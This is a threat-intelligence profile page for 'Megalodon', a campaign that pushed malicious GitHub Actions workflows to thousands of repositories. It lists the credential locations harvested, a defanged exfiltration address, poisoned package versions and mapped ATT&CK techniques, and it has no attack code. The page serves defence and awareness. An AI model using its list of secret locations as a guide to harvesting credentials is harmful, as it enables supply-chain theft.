Skip to main content
Mallory
Back to threat actors

Megalodon

Also known asMegalodon

Megalodon is an automated software supply-chain campaign targeting GitHub repositories by pushing malicious commits that inject GitHub Actions workflows to steal CI/CD secrets and cloud credentials. Researchers reported 5,718 malicious commits affecting 5,561 repositories within a roughly six-hour window on 2026-05-18, using forged CI-style identities such as build-bot, auto-ci, ci-bot, and pipeline-bot, along with fake bot-like email addresses and routine-looking commit messages. SafeDep assessed the commits were likely pushed using compromised personal access tokens or deploy keys, often directly to master without a pull request. The malicious workflows contained base64-encoded bash payloads and included at least two variants, SysDiag and Optimize-Build. The malware executes in CI/CD pipelines if a maintainer merges the poisoned commit. Reported collection targets include CI environment variables, /proc/*/environ, PID 1 environment data, AWS secret keys, Google Cloud access tokens, AWS/GCP/Azure metadata-service credentials, SSH private keys, Docker and Kubernetes configurations, Vault tokens, Terraform credentials, shell history, GitHub tokens, GitHub Actions OIDC token request URLs and tokens, GitLab CI/CD tokens, Bitbucket tokens, .env files, credentials.json, service-account.json, and source-code secrets matched via more than 30 regex patterns. Exfiltration to 216.126.225[.]129:8443 was reported. The campaign was observed compromising public repositories including Tiledesk, where attackers backdoored the GitHub repository rather than the npm account, leading the maintainer to unknowingly publish poisoned package versions 2.18.6 through 2.18.12; version 2.18.5 was identified as the last clean version. Reported affected repository groups also included Black-Iron-Project and WISE-Community repositories. CISA described Megalodon as a separate campaign that injected malicious GitHub Actions workflows to harvest CI/CD secrets and cloud credentials in public repositories. Multiple sources noted similarities to TeamPCP and Mini Shai-Hulud tradecraft, but Ox Security stated there was no direct threat-intelligence or code-analysis evidence linking Megalodon to TeamPCP and assessed it was likely a different threat actor imitating TeamPCP behavior and style. No additional aliases or sub-groups were identified in the provided content.

Share:
Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial
OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Who they target

Sectors the actor has been observed targeting.

  • Software & Services
MITRE ATT&CK

Tradecraft

17 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

8 of 15 tactics22 techniques×N= number of intelligence reports citing this technique
MITRE ATT&CK
TA0001
Initial Access
3 techniques
T1078×3
Valid Accounts
T1133
External Remote Services
T1195×3
Supply Chain Compromise
T1195.001×2
Compromise Software Dependencies and Development Tools
T1195.002
Compromise Software Supply Chain
TA0002
Execution
1 technique
T1059
Command and Scripting Interpreter
T1059.004
Unix Shell
TA0003
Persistence
3 techniques
T1078×3
Valid Accounts
T1133
External Remote Services
T1546×2
Event Triggered Execution
TA0004
Privilege Escalation
2 techniques
T1078×3
Valid Accounts
T1546×2
Event Triggered Execution
TA0005
Stealth
3 techniques
T1027×2
Obfuscated Files or Information
T1036×2
Masquerading
T1078×3
Valid Accounts
TA0006
Credential Access
2 techniques
T1552×3
Unsecured Credentials
T1552.001×2
Credentials In Files
T1552.004
Private Keys
T1552.005
Cloud Instance Metadata API
T1649×2
Steal or Forge Authentication Certificates
TA0009
Collection
1 technique
T1119
Automated Collection
TA0010
Exfiltration
1 technique
T1041×2
Exfiltration Over C2 Channel
ACTIVITY FEED

Recent activity

3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

3 SOURCESView more in app
sans iscNews
Jun 8, 2026
TeamPCP Supply Chain Campaign: Activity Through 2026-06-07

A separate campaign focused on injecting malicious GitHub Actions workflows into public repositories to steal CI/CD secrets and cloud credentials.

Read more
the hacker newsNews
May 22, 2026
Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows

Automated software supply chain campaign compromising GitHub repositories by pushing malicious commits that add GitHub Actions workflows to exfiltrate CI/CD secrets, cloud credentials, SSH keys, OIDC tokens, and source code secrets at scale.

Read more
register securityNews
May 22, 2026
Megalodon chums the waters in 5.5K+ GitHub repo poisonings

Automated software supply-chain campaign that pushed malicious commits to thousands of GitHub repositories to steal CI/CD and cloud credentials and propagate through poisoned source code.

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Start free trial
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping17

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables

Domains, IPs, and hashes tied to this actor, refreshed continuously.